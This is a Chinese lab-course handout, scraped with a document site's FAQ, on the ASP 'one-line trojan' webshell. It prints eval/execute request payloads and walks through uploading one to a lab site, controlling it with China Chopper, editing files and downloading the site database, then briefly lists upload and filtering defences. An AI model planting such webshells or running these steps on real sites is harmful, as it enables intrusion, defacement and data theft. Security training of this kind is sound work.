L003001041-一句话木马测试分析

课程编写类别内容实验课题名称L003001041-一句话木马测试分析实验目的与要求熟悉一句话木马的原理,掌握一句话木马的使用以及防御方法实验环境VPC1(虚拟PC)操作系统类型:windowsserver2003和windowsXPprofessional,网络接口:本地连接VPC1连接要求PC网络接口,本地连接与实验网络直连软件描述中国菜刀实验环境描述1、学生机与实验室网络直连;2、VPC1与实验室网络直连;3、学生机与VPC1物理链路连通;预备知识黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:<%executerequest("value")%>其中value是值,所以你可以更改自己的值,前面的request就是获取这个值<%evalrequest("value")%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的实用)当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell。(不知道数据库也可以,只要知道<%evalrequest("value")%>这个文件被插入到哪一个ASP文件里面就可以了。)这就被称为一句话木马,它是基于B/S结构的。实验内容理解该漏洞的实现过程实验步骤学生登录实验场景的操作1、学生单击“网络拓扑”进入实验场景,单击windows2003中的“打开控制台”按钮,进入目标主机。如图所示:我们把windows2003机器作为服务机(ip地址为192.168.41.17,不固定)2、学生输入账号administrator,密码123456,登录到实验场景中的Windowsserver2003,在该机器上搭建一个网站,并且能够正常访问。如图所示:3、学生输入账号administrator,密码123456,登录到实验场景中的WindowsXPProfessional。如图所示:4.打开windows2003上的网站,我们通过名小子或者啊D获取到了后台地址(这两个工具的使用方法可以参考明小子和啊Dsql注入实例),以及用户名和密码,然后登陆进去。如图所示:5.然后看到左边有一个文件上传菜单,点击它。如图所示:6.接下来我们可以在本地创建一个包含有一个一句话木马的asp文件。内容为“<%evalrequest("6")%>”,其中小括号里的6是咱们连接一句话的密码,密码也可以自行设置。如图所示:7.将刚才新建的文档,重命名为7.asp。如图所示:8.然后回到后台,单机浏览,选择刚才新建的7.asp文件。如图所示:9.点击打开后,进行上传,标题出写为8,并点击提交按钮。如图所示:10.提交完成后,就可以看到7.asp的保存路径了。如图所示:11.然后我们在浏览器里进行访问。如图所示:12.此处一片空白,说明我们上传的木马上传成功并可以执行。然后打开中国菜刀进行连接。进入到c:\share\tools\中国菜刀,打开chopper.exe。如图所示:13.默认情况下,中国菜刀自己会有几个示例。我们右击空白处,选择添加。如图所示:14.把刚才访问asp文件的地址放进地址栏,右侧输入连接密码“6”。下方默认类别不用改,脚本类型我们选择asp(Eval)类型,字符编码选择GB2312。如图所示:15.添加完毕后,我们右击该记录,然后选择文件管理。如图所示:16.接下来我们就会连接到刚才上传07.asp文件的目录。如图所示:17.我们可以进入网站根目录article,可以编辑任何文件,右击要编辑的文件。如图所示:18.会打开一个新的编辑框,编辑完后点击上方的保存按钮即可。如图所示:19.另外还可以进行上传下载文件,比如我们可以将测试网站的数据库article数据库下载下来。右击article.mdb,选择下载文件。如图所示:20.接下来选择要保存article.mdb的路径,保存到桌面上,然后点击保存。21.接下来待会就可以看到article.mdb保存到桌面上了。如图所示:22.另外我们通过中国菜刀还可以看到其他盘符的内容。如图所示:23.关于此类攻击手段的防护措施:23.1禁止上传脚本文件,并对上传文件夹的目录的执行脚本禁止掉。23.2另外就是网站开发人员,对get和post提交的内容中的execute,eval等内容进行过滤。

1、当您付费下载文档后,您只拥有了使用权限,并不意味着购买了版权,文档只能用于自身使用,不得用于其他商业用途(如 [转卖]进行直接盈利或[编辑后售卖]进行间接盈利)。
2、本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供参考,付费前请自行鉴别。
3、如文档内容存在侵犯商业秘密、侵犯著作权等,请点击“举报”。

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

客服邮箱:

biganzikefu@outlook.com

所有的文档都被视为“模板”,用于写作参考,下载前须认真查看,确认无误后再购买;

文档大部份都是可以预览的,笔杆子文库无法对文档的真实性、完整性、准确性以及专业性等问题提供审核和保证,请慎重购买;

文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为依据;

如果您还有什么不清楚的或需要我们协助,可以联系客服邮箱:

biganzikefu@outlook.com

常见问题具体如下:

1、问:已经付过费的文档可以多次下载吗?

      答:可以。登陆您已经付过费的账号,付过费的文档可以免费进行多次下载。

2、问:已经付过费的文档不知下载到什么地方去了?

     答:电脑端-浏览器下载列表里可以找到;手机端-文件管理或下载里可以找到。

            如以上两种方式都没有找到,请提供您的交易单号或截图及接收文档的邮箱等有效信息,发送到客服邮箱,客服经核实后,会将您已经付过费的文档即时发到您邮箱。

注:微信交易号是以“420000”开头的28位数字;

       支付宝交易号是以“2024XXXX”交易日期开头的28位数字。

笔杆子文秘
机构认证
内容提供者

为您提供优质文档,供您参考!

确认删除?